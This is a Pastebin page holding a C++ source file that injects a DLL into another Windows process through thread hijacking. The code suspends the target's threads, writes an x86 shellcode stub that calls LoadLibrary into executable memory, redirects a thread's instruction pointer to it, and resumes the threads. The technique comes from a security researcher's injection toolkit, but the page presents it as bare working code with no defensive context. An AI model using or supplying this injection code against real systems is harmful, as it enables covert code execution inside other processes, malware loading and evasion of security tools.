API tools faq
paste
Advertisement
libdo

Untitled

libdo
Oct 15th, 2017
210
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.23 KB | None | 0 0
raw download clone embed print report diff
  1. /*
  2. CreateMethods.cpp
  3. brad.antoniewicz@foundstone.com
  4.  
  5. Contains the thread creation functions.
  6.  
  7. Currently implements:
  8.  
  9. 1. Suspend/Inject/Resume Method
  10. 2. ntCreateThreadEx()
  11. 3. RtlCreateUserThread()
  12. */
  13.  
  14.  
  15.  
  16. #include <windows.h>
  17. #include <stdio.h>
  18. #include <tlhelp32.h>
  19. #include "ExecThread.h"
  20. #include "AllocWriteDLL.h"
  21.  
  22. #ifndef _WIN64
  23. VOID suspendInjectResume(HANDLE hHandle, LPVOID loadLibAddr, LPVOID dllPathAddr) {
  24. /*
  25. This is a mixture from the following sites:
  26.  
  27. http://syprog.blogspot.com/2012/05/createremotethread-bypass-windows.html
  28. http://www.kdsbest.com/?p=159
  29. */
  30.  
  31. HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
  32. HANDLE hSnapshot2 = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
  33. HANDLE thread = NULL;
  34. THREADENTRY32 te;
  35. THREADENTRY32 te2;
  36.  
  37. CONTEXT ctx;
  38. DWORD firstThread = 0;
  39. HANDLE targetThread = NULL;
  40.  
  41. LPVOID scAddr;
  42.  
  43. int i;
  44.  
  45. unsigned char sc[] = {
  46. // Push all flags
  47. 0x9C,
  48. // Push all register
  49. 0x60,
  50. // Push 3,4,5,6 (dllPathAddr)
  51. 0x68, 0xAA, 0xAA, 0xAA, 0xAA,
  52. // Mov eax, 8,9,10, 11 (loadLibAddr)
  53. 0xB8, 0xBB, 0xBB, 0xBB, 0xBB,
  54. // Call eax
  55. 0xFF, 0xD0,
  56. // Pop all register
  57. 0x61,
  58. // Pop all flags
  59. 0x9D,
  60. // Ret
  61. 0xC3
  62. };
  63.  
  64. te.dwSize = sizeof(THREADENTRY32);
  65. te2.dwSize = sizeof(THREADENTRY32);
  66. ctx.ContextFlags = CONTEXT_FULL;
  67.  
  68. sc[3] = ((unsigned int) dllPathAddr & 0xFF);
  69. sc[4] = (((unsigned int) dllPathAddr >> 8 )& 0xFF);
  70. sc[5] = (((unsigned int) dllPathAddr >> 16 )& 0xFF);
  71. sc[6] = (((unsigned int) dllPathAddr >> 24 )& 0xFF);
  72.  
  73. sc[8] = ((unsigned int) loadLibAddr & 0xFF);
  74. sc[9] = (((unsigned int) loadLibAddr >> 8 )& 0xFF);
  75. sc[10] = (((unsigned int) loadLibAddr >> 16 )& 0xFF);
  76. sc[11] = (((unsigned int) loadLibAddr >> 24 )& 0xFF);
  77.  
  78.  
  79.  
  80. // Suspend Threads
  81. if(Thread32First(hSnapshot, &te)) {
  82. do {
  83. if(te.th32OwnerProcessID == GetProcessId(hHandle)) {
  84. if ( firstThread == 0 )
  85. firstThread = te.th32ThreadID;
  86. thread = OpenThread(THREAD_ALL_ACCESS | THREAD_GET_CONTEXT, FALSE, te.th32ThreadID);
  87. if(thread != NULL) {
  88. printf("t[+] Suspending Thread 0x%08xn", te.th32ThreadID);
  89. SuspendThread(thread);
  90. CloseHandle(thread);
  91. } else {
  92. printf("t[+] Could not open thread!n");
  93. }
  94. }
  95. } while(Thread32Next(hSnapshot, &te));
  96. } else {
  97. printf("t[+] Could not Thread32First! [%d]n", GetLastError());
  98. CloseHandle(hSnapshot);
  99. exit(-1);
  100. }
  101. CloseHandle(hSnapshot);
  102.  
  103. printf("t[+] Our Launcher Code:nt");
  104. for (i=0; i<17; i++)
  105. printf("%02x ",sc[i]);
  106. printf("n");
  107. // Get/Save EIP, Inject
  108. printf("t[+] Targeting Thread 0x%08xn",firstThread);
  109. targetThread = OpenThread(THREAD_ALL_ACCESS, FALSE, firstThread);
  110. if (GetThreadContext(targetThread, &ctx) == 0)
  111. printf("[!] GetThreadContext Failed!n");
  112. printf("t[+] Current Registers: nttEIP[0x%08x] ESP[0x%08x]n", ctx.Eip, ctx.Esp);
  113.  
  114. printf("t[+] Saving EIP for our returnn");
  115. ctx.Esp -= sizeof(unsigned int);
  116. WriteProcessMemory(hHandle, (LPVOID)ctx.Esp, (LPCVOID)&ctx.Eip, sizeof(unsigned int), NULL);
  117. printf("ttEIP[0x%08x] ESP[0x%08x] EBP[0x%08x]n", ctx.Eip, ctx.Esp, ctx.Ebp);
  118.  
  119. scAddr = VirtualAllocEx(hHandle, NULL, 17, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  120. printf("t[+] Allocating 17 bytes for our Launcher Code [0x%08x][%d]n", scAddr, GetLastError());
  121.  
  122. printf ("t[+] Writing Launcher Code into targetThread [%d]n", WriteProcessMemory(hHandle, scAddr, (LPCVOID)sc, 17, NULL));
  123.  
  124. printf("t[+] Setting EIP to LauncherCoden");
  125. ctx.Eip = (DWORD)scAddr;
  126. printf("ttEIP[0x%08x] ESP[0x%08x]n", ctx.Eip, ctx.Esp);
  127.  
  128. if (SetThreadContext(targetThread, &ctx) == 0)
  129. printf("[!] SetThreadContext Failed!n");
  130.  
  131. // Resume Threads
  132. hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
  133. te.dwSize = sizeof(THREADENTRY32);
  134.  
  135. if(Thread32First(hSnapshot2, &te2)) {
  136. do {
  137. if(te2.th32OwnerProcessID == GetProcessId(hHandle)) {
  138. thread = OpenThread(THREAD_ALL_ACCESS | THREAD_GET_CONTEXT, FALSE, te2.th32ThreadID);
  139. if(thread != NULL) {
  140. printf("t[+] Resuming Thread 0x%08xn", te2.th32ThreadID);
  141. ResumeThread(thread);
  142. if (te2.th32ThreadID == firstThread)
  143. WaitForSingleObject(thread, 5000);
  144. CloseHandle(thread);
  145. } else {
  146. printf("t[+] Could not open thread!n");
  147. }
  148. }
  149. } while(Thread32Next(hSnapshot2, &te2));
  150. } else {
  151. printf("t[+] Could not Thread32First! [%d]n", GetLastError());
  152. CloseHandle(hSnapshot2);
  153. exit(-1);
  154. }
  155. CloseHandle(hSnapshot2);
  156. }
  157. #endif
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!